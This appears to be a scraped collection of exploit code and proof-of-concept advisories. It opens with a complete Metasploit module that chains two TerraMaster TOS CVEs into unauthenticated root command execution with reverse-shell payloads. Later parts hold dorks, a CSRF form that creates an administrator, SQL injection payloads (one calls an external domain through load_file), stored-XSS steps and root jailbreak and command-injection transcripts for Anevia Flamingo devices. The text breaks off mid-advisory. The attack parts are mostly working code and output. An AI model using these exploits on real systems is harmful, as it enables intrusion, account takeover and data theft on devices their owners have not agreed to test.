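##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'digest/md5'
require 'time'

# TerraMaster TOS <= 4.2.29: the `webNasIPS` endpoint leaks the admin password
# hash and the device MAC address (CVE-2022-24990); those values are enough to
# build the signed headers the `createRaid` endpoint expects, which then runs
# the supplied command as root (CVE-2022-24989).
#
# Data flow: `get_data` fills @data from the leak, `execute_command` spends it.
# `get_terramaster_info` / `check` fingerprint the TOS version from the login
# page and never raise on an unexpected reply (they report Unknown instead).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  # Highest TOS version `check` reports as vulnerable.
  LAST_VULNERABLE_TOS_VERSION = '4.2.29'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS 4.2.29
          and lower by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information"
          and CVE-2022-24989, "Authenticated remote code execution".
          Exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as admin password
          hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint
          `api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to execute remote code as root
          on TerraMaster NAS devices.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
          'Octagon Networks', # Discovery
          '0xf4n9x' # POC
        ],
        'References' => [
          ['CVE', '2022-24990'],
          ['CVE', '2022-24989'],
          ['URL', 'https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/'],
          ['URL', 'https://github.com/0xf4n9x/CVE-2022-24990'],
          ['URL', 'https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990']
        ],
        'DisclosureDate' => '2022-03-07',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => ['bourne', 'wget', 'curl'],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 8181,
          'SSL' => false
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/'])
    ])
  end

  # Harvests the values a signed `createRaid` request needs from the
  # `api.php?mobile/webNasIPS` information leak (CVE-2022-24990) and stores
  # them in @data under the keys 'password', 'mac', 'key', 'timestamp' and
  # 'signature'.
  #
  # @data is only populated when every field could be parsed; on any
  # unexpected reply it is left empty so `exploit` aborts with a clear
  # failure instead of a NoMethodError on a nil field.
  #
  # @return [Hash] the populated (or empty) @data hash
  def get_data
    @data = {}

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/webNasIPS'),
      'headers' => {
        'User-Agent' => 'TNAS'
      }
    })
    return @data unless res && res.code == 200 && res.body.include?('webNasIPS successful')

    res_json = res.get_json_document
    return @data if res_json.blank?

    # The 'data' field is a string; the password hash sits between 'PWD:' and
    # 'SAT', the MAC address follows 'mac":"' and runs up to the next quote.
    leaked = res_json['data'].to_s
    password = extract_between(leaked, 'PWD:', 'SAT')&.strip
    mac = extract_between(leaked, 'mac":"', '"')&.tr(':', '')&.strip
    return @data if password.nil? || mac.nil?

    key = mac[6..11] # last three octets of the MAC address (colons removed)
    return @data if key.to_s.empty?

    timestamp = Time.now.to_i.to_s
    @data = {
      'password' => password,
      'mac' => mac,
      'key' => key,
      'timestamp' => timestamp,
      'signature' => tos_encrypt_str(key, timestamp) # derive signature
    }
  end

  # MD5 hex digest of +key+ followed by +str_to_encrypt+; used as the
  # 'Signature' request header (see `execute_command`).
  #
  # @param key [String] last three octets of the MAC address, no colons
  # @param str_to_encrypt [String] the unix timestamp as a string
  # @return [String] 32-character lowercase hex digest
  def tos_encrypt_str(key, str_to_encrypt)
    Digest::MD5.hexdigest((key + str_to_encrypt).encode('utf-8'))
  end

  # Submits +cmd+ to `api.php?mobile/createRaid` (CVE-2022-24989) with the
  # 'Authorization', 'Signature' and 'Timestamp' headers taken from @data, so
  # `get_data` must have run first. The response is not inspected: a payload
  # that executes successfully typically keeps the server from answering.
  #
  # @param cmd [String] command line to run on the target
  # @param _opts [Hash] unused; kept for the CmdStager callback interface
  # @return the value returned by send_request_cgi
  def execute_command(cmd, _opts = {})
    diskstring = Rex::Text.rand_text_alpha_upper(4..8)

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/createRaid'),
      'ctype' => 'application/x-www-form-urlencoded',
      'headers' => {
        'User-Agent' => 'TNAS',
        'Authorization' => @data['password'],
        'Signature' => @data['signature'],
        'Timestamp' => @data['timestamp']
      },
      'vars_post' => {
        'raidtype' => ";#{cmd}",
        'diskstring' => diskstring
      }
    })
  end

  # Fingerprints the target from the login page (`tos/index.php?user/login`)
  # and stores 'cpu_arch' and 'tos_version' in @terramaster.
  #
  # The version marker is a stylesheet link such as
  #   <link href="./static/style/bootstrap.css?ver=TOS3_A1.0_4.2.07" rel="stylesheet"/>
  # '_A' in the marker means ARM64, '_S' or '_Q' means X64, anything else is
  # reported as UNKNOWN; the TOS version is the text after '.0_' minus the
  # closing quote. @terramaster stays empty when the page, the marker or the
  # version part is missing, so callers can treat "empty" as "not fingerprinted".
  #
  # @return [Hash] the populated (or empty) @terramaster hash
  def get_terramaster_info
    @terramaster = {}
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'tos', 'index.php?user/login')
    })
    return @terramaster unless res && res.body && res.code == 200

    version = res.body[/ver=.+?"/]
    return @terramaster if version.nil?

    # strip TOS version number and remove trailing double quote.
    tos_version = version.split('.0_')[1]&.chop
    return @terramaster if tos_version.nil? || tos_version.empty?

    cpu_arch =
      if version.include?('_A')
        'ARM64'
      elsif version.include?('_S') || version.include?('_Q')
        'X64'
      else
        'UNKNOWN'
      end

    @terramaster = { 'cpu_arch' => cpu_arch, 'tos_version' => tos_version }
  end

  # Vulnerable when the fingerprinted TOS version is <= LAST_VULNERABLE_TOS_VERSION,
  # Safe when it is newer, Unknown when the version could not be read or parsed.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    get_terramaster_info
    return CheckCode::Unknown('Could not determine the TOS version.') if @terramaster.empty?

    summary = "TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}."
    begin
      vulnerable = Rex::Version.new(@terramaster['tos_version']) <= Rex::Version.new(LAST_VULNERABLE_TOS_VERSION)
    rescue ArgumentError
      # Rex::Version rejects malformed version strings; report that rather than raise from check.
      return CheckCode::Unknown("Could not parse the TOS version. #{summary}")
    end

    vulnerable ? CheckCode::Vulnerable(summary) : CheckCode::Safe(summary)
  end

  def exploit
    get_data
    fail_with(Failure::UnexpectedReply, 'Can not retrieve the leaked data.') if @data.empty?

    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      # Don't check the response here since the server won't respond
      # if the payload is successfully executed.
      execute_cmdstager(linemax: 65536)
    end
  end

  private

  # Text of +haystack+ after the first +left+ and before the next +right+
  # (the rest of the string when +right+ is absent), or nil when +left+ is
  # absent or nothing follows it. Mirrors the split/split chain used to parse
  # the leaked data, without raising on missing delimiters.
  #
  # @param haystack [String]
  # @param left [String]
  # @param right [String]
  # @return [String, nil]
  def extract_between(haystack, left, right)
    tail = haystack.split(left)[1]
    tail&.split(right)&.first
  end
end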
<pre><code>====================================================================================================================================<br />| # Title : ProLogin V1.9 Insecure Direct Object Reference Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | <br />| # Vendor : https://codecanyon.net/item/pro-login-advanced-secure-php-user-management-system/12388905?s_rank=169 | <br />| # Dork : "Login - ProLogin" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /index.php/user_settings<br /><br />[-] When you add value (user_settings) after the index.php/, <br /> an error page appears At the same time, it shows you the panel & limited control .<br /><br />[+] http://127.0.0.1/support.ihorizon.sa/index.php/user_settings<br /><br /><br />Greetings to :=============================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*|<br />===========================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Piyanas v0.1 User Login Page CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://www.piyanassystem.com/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] infected file : /add_user.php<br /><br />[+] Use Payload : /admin/add_user.php<br /><br />[+] http://127.0.0.1/piyanassystemcom/piyanasmember/admin/add_user.php<br /><br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : phpAnalyzer v2.0.4 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : https://codecanyon.net/item/phpanalyzer-instagram-audit-report-tool/21933992 | <br />| # Dork : "Copyright © phpAnalyzer.com. All rights reserved. Product by AltumCode" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use user & pass : admin<br /><br />[+] http://127.0.0.1/phpAnalyzer/admin<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : EasyAnswer version 1.0.1 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.1(64-bit) | <br />| # Vendor : https://www.codester.com/items/40311/ | <br />| # Dork : "© 2022 Easy Answer All rights reserved." |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] infected file: admins-create.php<br /><br />[+] Inside folder /admin/admins-create.php<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Copy the code below and paste it into an HTML file.<br /><br />[+] Go to the line 17.<br /><br />[+] Set the target site link Save changes and apply . <br /><br /> </i>Create Administrator</h2><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /> <br /> <div class="row"><br /> <div class="col-md-12 stretch-card"><br /> <div class="card"><br /> <br /> <div class="card-body"><br /> <br /> <div id="messages"><br /> </div><br /> <br /> <form action="http://CHANGE_TARGET.com/admin/admins-create.php" method="post" id="main_form" name="main_form" enctype="multipart/form-data"><br /> <input type="hidden" id="submitform" name="submitform" value="1"><br /> <br /> <div class="form-group row"><br /> <label for="username" class="col-sm-2 col-form-label">Username:</label><br /> <div class="col-sm-12"><br /> <input type="text" class="form-control" id="username" name="username" value="" placeholder="ADMIN USERNAME"><br /> </div><br /> </div><br /> <div class="form-group row"><br /> <label for="password" class="col-sm-2 col-form-label">Password:</label><br /> <div class="col-sm-12"><br /> <input type="password" class="form-control" id="password" name="password" value="" placeholder="ADMIN 
PASSWORD"><br /> </div><br /> </div><br /> <br /> <div class="form-group row"><br /> <label for="email" class="col-sm-2 col-form-label">E-Mail:</label><br /> <div class="col-sm-12"><br /> <input type="email" class="form-control" id="email" name="email" value="" placeholder="ADMIN E-MAIL ADDRESS"><br /> </div><br /> </div><br /> <br /> <div class="row-spaces"></div><br /> <br /> <p><br /> <button type="button" class="btn btn-primary btn-col-light me-2" onclick="document.main_form.submit();" style=""><span>Submit</span></button><br /> </p><br /> </form><br /> <br /> <br /> </div><br /> </div><br /> </div><br /> </div><br /> <br /> </div><br /> <br />Greetings to :===================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet| <br />==================================================================================================<br /></code></pre>
<pre><code>## Title: OTAS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 06.12.2023<br />## Vendor: https://github.com/oretnom23<br />## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The password parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'<br />was submitted in the password parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain. The application interacted with that domain, indicating that<br />the injected SQL query was executed. The attacker can dump all<br />information from the<br />database of this system, and then he can use it for dangerous and<br />malicious purposes!<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: password (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')<br />OR NOT 1404=1404-- Eotr<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')<br />AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT<br />(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')<br />AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY<br />---<br 
/><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)<br /><br />## Time spent:<br />01:15:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Xoops CMS Version 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)<br /># Date: 2023-06-12<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://xoops.org/<br /># Software: https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10<br /># Version: 2.5.10<br /># Tested on: https://www.softaculous.com/apps/cms/Xoops<br /><br /><br />--- Description ---<br /><br />1) Log in to the admin panel, click Image Manager, and choose Add Category:<br />https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images<br />2) Write your payload in the Category Name field and submit:<br />Payload: <script>alert(1)</script><br />3) After clicking multiupload, when you hover the mouse over the payload name, the alert box appears<br />https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2<br /><br /><br /></code></pre>
<pre><code><br />Anevia Flamingo XL 3.2.9 (login) Remote Root Jailbreak<br /><br /><br />Vendor: Ateme<br />Product web page: https://www.ateme.com<br />Affected version: 3.2.9<br /> Hardware revision 1.0<br /> SoapLive 2.0.3<br /><br />Summary: Flamingo XL, a new modular and high-density IPTV head-end<br />product for hospitality and corporate markets. Flamingo XL captures<br />live TV and radio content from satellite, cable, digital terrestrial<br />and analog sources before streaming it over IP networks to STBs, PCs<br />or other IP-connected devices. The Flamingo XL is based upon a modular<br />4U rack hardware platform that allows hospitality and corporate video<br />service providers to deliver a mix of channels from various sources<br />over internal IP networks.<br /><br />Desc: Once the admin establishes a secure shell session, she gets<br />dropped into a sandboxed environment using the login binary that<br />allows a specific set of commands. One of those commands that can be<br />exploited to escape the jailed shell is traceroute. A remote attacker<br />can break out of the restricted environment and have full root access<br />to the device.<br /><br />Tested on: GNU/Linux 3.1.4 (x86_64)<br /> Apache/2.2.15 (Unix)<br /> mod_ssl/2.2.15<br /> OpenSSL/0.9.8g<br /> DAV/2<br /> PHP/5.3.6<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5780<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php<br /><br /><br />13.04.2023<br /><br />--<br /><br /><br />$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1<br />The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.<br />RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.<br />Are you sure you want to continue connecting (yes/no/[fingerprint])? 
yes<br />Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.<br />Anevia Flamingo XL<br />root@192.168.1.1's password:<br />Primary-XL> help<br />available commands:<br /> bonding<br /> config<br /> date<br /> dns<br /> enable<br /> ethconfig<br /> exit<br /> exp<br /> firewall<br /> help<br /> hostname<br /> http<br /> igmpq<br /> imp<br /> ipconfig<br /> license<br /> log<br /> mail<br /> passwd<br /> persistent_logs<br /> ping<br /> reboot<br /> reset<br /> route<br /> serial<br /> settings<br /> sslconfig<br /> tcpdump<br /> timezone<br /> traceroute<br /> upgrade<br /> uptime<br /> version<br /> vlanconfig<br /><br />Primary-XL> tcpdump ;id<br />tcpdump: illegal token: ;<br />Primary-XL> id<br />unknown command id<br />Primary-XL> whoami<br />unknown command whoami<br />Primary-XL> ping ;id<br />ping: ;id: Host name lookup failure<br />Primary-XL> traceroute ;id<br />BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary<br /><br />Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]<br /> [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]<br /> [-z pausemsecs] host [data size]<br /><br />trace the route ip packets follow going to "host"<br />Options:<br /> -F Set the don't fragment bit<br /> -I Use ICMP ECHO instead of UDP datagrams<br /> -l Display the ttl value of the returned packet<br /> -d Set SO_DEBUG options to socket<br /> -n Print hop addresses numerically rather than symbolically<br /> -r Bypass the normal routing tables and send directly to a host<br /> -v Verbose output<br /> -m max_ttl Set the max time-to-live (max number of hops)<br /> -p port# Set the base UDP port number used in probes<br /> (default is 33434)<br /> -q nqueries Set the number of probes per ``ttl'' to nqueries<br /> (default is 3)<br /> -s src_addr Use the following IP address as the source address<br /> -t tos Set the type-of-service in probe packets to the following value<br /> (default 0)<br /> -w wait Set the time 
(in seconds) to wait for a response to a probe<br /> (default 3 sec)<br /> -g Specify a loose source route gateway (8 maximum)<br /><br />uid=0(root) gid=0(root) groups=0(root)<br />Primary-XL> version<br />Software Revision: Anevia Flamingo XL v3.2.9<br />Hardware Revision: 1.0<br />(c) Anevia 2003-2012<br />Primary-XL> traceroute ;sh<br />...<br />...<br />whoami<br />root<br />id<br />uid=0(root) gid=0(root) groups=0(root)<br />ls -al<br />drwxr-xr-x 19 root root 1024 Oct 3 2022 .<br />drwxr-xr-x 19 root root 1024 Oct 3 2022 ..<br />drwxr-xr-x 2 root root 1024 Oct 21 2013 bin<br />drwxrwxrwt 2 root root 40 Oct 3 2022 cores<br />drwxr-xr-x 13 root root 27648 May 22 00:53 dev<br />drwxr-xr-x 3 root root 1024 Oct 21 2013 emul<br />drwxr-xr-x 48 1000 1000 3072 Oct 3 2022 etc<br />drwxr-xr-x 3 root root 1024 Oct 3 2022 home<br />drwxr-xr-x 11 root root 3072 Oct 21 2013 lib<br />lrwxrwxrwx 1 root root 20 Oct 21 2013 lib32 -> /emul/ia32-linux/lib<br />lrwxrwxrwx 1 root root 3 Oct 21 2013 lib64 -> lib<br />drwx------ 2 root root 12288 Oct 21 2013 lost+found<br />drwxr-xr-x 4 root root 1024 Oct 21 2013 mnt<br />drwxrwxrwt 2 root root 80 May 22 00:45 php_sessions<br />dr-xr-xr-x 177 root root 0 Oct 3 2022 proc<br />drwxr-xr-x 4 root root 1024 Oct 21 2013 root<br />drwxr-xr-x 2 root root 2048 Oct 21 2013 sbin<br />drwxr-xr-x 12 root root 0 Oct 3 2022 sys<br />drwxrwxrwt 26 root root 1140 May 22 01:06 tmp<br />drwxr-xr-x 10 1000 1000 1024 Oct 21 2013 usr<br />drwxr-xr-x 14 root root 1024 Oct 21 2013 var<br /><br />ls /var/www/admin<br />_img configuration.php log_securemedia.php stream_dump.php<br />_lang cores_and_logs_management.php login.php stream_services<br />_lib dataminer_handshake.php logout.php streaming.php<br />_style dvbt.php logs.php support.php<br />about.php dvbt_scan.php main.php template<br />ajax export.php manager.php time.php<br />alarm.php fileprogress.php network.php toto.ts<br />alarm_view.php firewall.php pear upload_helper.php<br 
/>authentication.php get_config power.php uptime.php<br />bridges.php get_enquiry_pending.php read_settings.php usbloader.php<br />cam.php get_upgrade_error.php receive_helper.php version.php<br />channel.php heartbeat.php rescrambling webradio.php<br />channel_xl_list.php include rescrambling.php webtv<br />check_state input.php resilience webtv.php<br />class js resilience.php xmltv.php<br />common license.php restart_service.php<br />config_snmp.php log.php set_oem.php<br /><br />python -c 'import pty; pty.spawn("/bin/bash")'<br />root@Primary-XL:/# cd /usr/local/bin<br />root@Primary-XL:/usr/local/bin# ls -al login<br />-rwxr-xr-x 1 root root 35896 Feb 21 2012 login<br />root@Primary-XL:/usr/local/bin# cd ..<br />root@Primary-XL:/usr/local# ls commands/<br />bonding firewall mail timezone<br />config help passwd traceroute<br />date hostname persistent_logs upgrade<br />dbg-serial http ping uptime<br />dbg-set-oem igmpq route version<br />dbg-updates-log imp serial vlanconfig<br />dns ipconfig settings<br />ethconfig license sslconfig<br />exp log tcpdump<br />root@Primary-XL:/usr/local# exit<br />exit<br />Primary-XL> enable<br />password:<br />Primary-XL# ;]<br /></code></pre>
<pre><code><br />Anevia Flamingo XL 3.6.20 Authenticated Root Remote Code Execution<br /><br /><br />Vendor: Ateme<br />Product web page: https://www.ateme.com<br />Affected version: 3.6.20, 3.2.9<br /> Hardware revision 1.1, 1.0<br /> SoapLive 2.4.1, 2.0.3<br /> SoapSystem 1.3.1<br /><br />Summary: Flamingo XL, a new modular and high-density IPTV head-end<br />product for hospitality and corporate markets. Flamingo XL captures<br />live TV and radio content from satellite, cable, digital terrestrial<br />and analog sources before streaming it over IP networks to STBs, PCs<br />or other IP-connected devices. The Flamingo XL is based upon a modular<br />4U rack hardware platform that allows hospitality and corporate video<br />service providers to deliver a mix of channels from various sources<br />over internal IP networks.<br /><br />Desc: The affected device suffers from authenticated remote code<br />execution vulnerability. A remote attacker can exploit this issue<br />and execute arbitrary system commands granting her system access<br />with root privileges.<br /><br />Tested on: GNU/Linux 3.1.4 (x86_64)<br /> Apache/2.2.15 (Unix)<br /> mod_ssl/2.2.15<br /> OpenSSL/0.9.8g<br /> DAV/2<br /> PHP/5.3.6<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5779<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php<br /><br /><br />13.04.2023<br /><br />--<br /><br /><br />> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root<br /> % Total % Received % Xferd Average Speed Time Time Time Current<br /> Dload Upload Total Spent Left Speed<br /> 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.1.1:80...<br />* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)<br />> POST /admin/time.php HTTP/1.1<br />> Host: 192.168.1.1<br />> User-Agent: curl/8.0.1<br />> 
Accept: */*<br />> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4<br />> Content-Length: 32<br />> Content-Type: application/x-www-form-urlencoded<br />><br />} [32 bytes data]<br />100 32 0 0 100 32 0 25 0:00:01 0:00:01 --:--:-- 25< HTTP/1.1 302 Found<br />< Date: Thu, 13 Apr 2023 23:54:15 GMT<br />< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6<br />< X-Powered-By: PHP/5.3.6<br />< Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />< Pragma: no-cache<br />* Please rewind output before next send<br />< Location: /admin/time.php<br />< Transfer-Encoding: chunked<br />< Content-Type: text/html<br /><<br />* Ignoring the response-body<br />{ [5 bytes data]<br />100 32 0 0 100 32 0 19 0:00:01 0:00:01 --:--:-- 19<br />* Connection #0 to host 192.168.1.1 left intact<br />* Issue another request to this URL: 'http://192.168.1.1/admin/time.php'<br />* Switch from POST to GET<br />* Found bundle for host: 0x1de6c6321b0 [serially]<br />* Re-using existing connection #0 with host 192.168.1.1<br />> POST /admin/time.php HTTP/1.1<br />> Host: 192.168.1.1<br />> User-Agent: curl/8.0.1<br />> Accept: */*<br />> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4<br />><br />< HTTP/1.1 200 OK<br />< Date: Thu, 13 Apr 2023 23:54:17 GMT<br />< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6<br />< X-Powered-By: PHP/5.3.6<br />< Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />< Pragma: no-cache<br />< Transfer-Encoding: chunked<br />< Content-Type: text/html<br /><<br />{ [13853 bytes data]<br />14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br /> <----------------------<<<br />14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br /> <----------------------<<<br />100 33896 0 33896 0 0 14891 0 --:--:-- 0:00:02 --:--:-- 99k<br />* Connection #0 to host 
192.168.1.1 left intact<br /></code></pre>
<pre><code><br />Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code Execution<br /><br /><br />Vendor: Ateme<br />Product web page: https://www.ateme.com<br />Affected version: 3.6.5<br /> Hardware revision: 1.1<br /> SoapLive 2.4.0<br /> SoapSystem 1.3.1<br /><br />Summary: Flamingo XL, a new modular and high-density IPTV head-end<br />product for hospitality and corporate markets. Flamingo XL captures<br />live TV and radio content from satellite, cable, digital terrestrial<br />and analog sources before streaming it over IP networks to STBs, PCs<br />or other IP-connected devices. The Flamingo XL is based upon a modular<br />4U rack hardware platform that allows hospitality and corporate video<br />service providers to deliver a mix of channels from various sources<br />over internal IP networks.<br /><br />Desc: The affected device suffers from authenticated remote code<br />execution vulnerability. A remote attacker can exploit this issue<br />and execute arbitrary system commands granting her system access<br />with root privileges.<br /><br />Tested on: GNU/Linux 3.14.29 (x86_64)<br /> Apache/2.2.22 (Debian)<br /> PHP/5.6.0-0anevia2<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5778<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php<br /><br /><br />13.04.2023<br /><br />--<br /><br /><br />$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data<br /> <td>uid=33(www-data)</td><br /> <input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/><br /> <td>gid=33(www-data)</td><br /> <input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/><br /> <td>groups=33(www-data),6(disk),25(floppy)</td><br /> <input type="hidden" name="ntp_hosts[]" 
